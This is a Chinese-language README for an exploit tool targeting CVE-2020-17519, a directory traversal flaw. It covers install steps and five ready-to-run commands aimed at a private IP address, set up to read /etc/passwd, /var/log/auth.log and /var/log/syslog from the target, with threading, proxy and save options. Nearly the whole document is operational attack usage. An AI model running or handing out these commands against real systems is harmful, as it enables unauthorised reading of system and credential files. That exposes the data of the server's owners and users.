一个使用目录遍历技术从目标URL请求日志文件的Python工具。它实时显示进度,支持代理配置,并可选择保存有效响应。
requests 和 pwntools (pwn)argparse、os、concurrent.futures、threadinggit clone https://github.com/GazettEl/CVE-2020-17519.git
pip install requests pwntools
该工具可通过命令行执行,带有多种选项。以下是一些示例:
示例 1:请求单个文件路径
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 12 --file-path /var/log/syslog --threads 1 --save
示例 2:从列表请求多个文件路径
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 12 --file-list file_paths.txt --threads 4 --proxy none
示例 3:禁用代理运行
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 10 --file-path /var/log/auth.log --threads 2 --proxy none
示例 4:使用文件列表并保存有效响应
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 15 --file-list paths.txt --threads 4 --save
示例 5:增加深度请求单个文件
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 20 --file-path /etc/passwd --threads 1
更多详情请参考源代码及内联注释。